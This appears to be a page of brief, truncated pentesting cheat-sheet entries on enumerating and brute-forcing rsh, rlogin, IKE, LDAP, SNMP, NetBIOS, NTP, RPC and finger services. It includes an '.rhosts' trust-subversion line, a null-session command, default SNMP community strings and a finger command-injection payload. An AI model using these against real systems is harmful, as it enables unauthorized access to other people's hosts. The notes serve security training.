Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Rsh Enumeration
> rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
Rsh Brute Force
> rsh-grind ( http://pentestmonkey.net/tools/rsh-grind/ )
> Hydra ( http://freeworld.thc.org/ )
> medusa ( http://www.foofus.net/jmk/medusa/ )...


Score: 0


Rlogin Enumeration
> Find the files
find / -name .rhosts
locate .rhosts
> Examine Files
cat .rhosts
> Manual Login
rlogin hostname -l username
rlogin <IP>
> Subvert the files
echo ++ > .rhosts

Rlogin Brute force
> Hydra ( http://freeworld.thc.org/ )...


Score: 0


modscan
http://www.packetstormsecurity.org/UNIX/scanners/modscan.py.txt...


Score: 0


Enumeration
> ike-scan ( http://www.nta-monitor.com/ike-scan/ )
> ike-probe ( http://www.ernw.de/download/ikeprobe.zip )

Brute-Force
> ike-crack ( http://ikecrack.sourceforge.net/ )

Reference Material
> PSK cracking paper ( http://www.ernw.de/download/pskattack.pdf )
> SecurityFocus Infocus ( http://www.securityfocus....


Score: 0


ldap enumeration
> ldapminer ( http://sourceforge.net/projects/ldapminer/ )
ldapminer -h ip_address -p port (not required if default) -d
> luma ( http://luma.sourceforge.net/ )
Gui based tool
> ldp ( http://www.microsoft.com/ )
Gui based tool
> openldap ( http://www.vulnerabilityassessment.co.uk/%20http://www.openldap.org/ )
...


Score: 0


Default Community Strings
> public
> private
> cisco
>> cable-docsis
>> ILMI

MIB enumeration
> Windows NT
>> .1.3.6.1.2.1.1.5 Hostnames
>> .1.3.6.1.4.1.77.1.4.2 Domain Name
>> .1.3.6.1.4.1.77.1.2.25 Usernames
>> .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
>> .1.3.6.1.4.1....


Score: 0


NetBIOS enumeration
> Enum
>> enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
> Null Session
>> net use \\192.168.1.1\ipc$ "" /u:""
>>> net view \\ip_address
>>> Dumpsec ( http://www.systemtools.com/download/dumpacl.zip )
&g...


Score: 0


NTP Enumeration
> ntpdc -c monlist IP_ADDRESS
> ntpdc -c sysinfo IP_ADDRESS
> ntpq
>> host
>> hostname
>> ntpversion
>> readlist
>> version

Examine configuration files
> ntp.conf...


Score: 0


rpcdump.py ( http://oss.coresecurity.com/impacket/rpcdump.py )
> rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

rpcinfo
> rpcinfo [options] IP_Addres...


Score: 0


User enumeration
> finger 'a b c d e f g h' @example.com
> finger admin@example.com
> finger user@example.com
> finger 0@example.com
> finger .@example.com
> finger **@example.com
> finger test@example.com
> finger @example.com

Command execution
> finger "|/bin/id@example.com"
&g...


Score: 0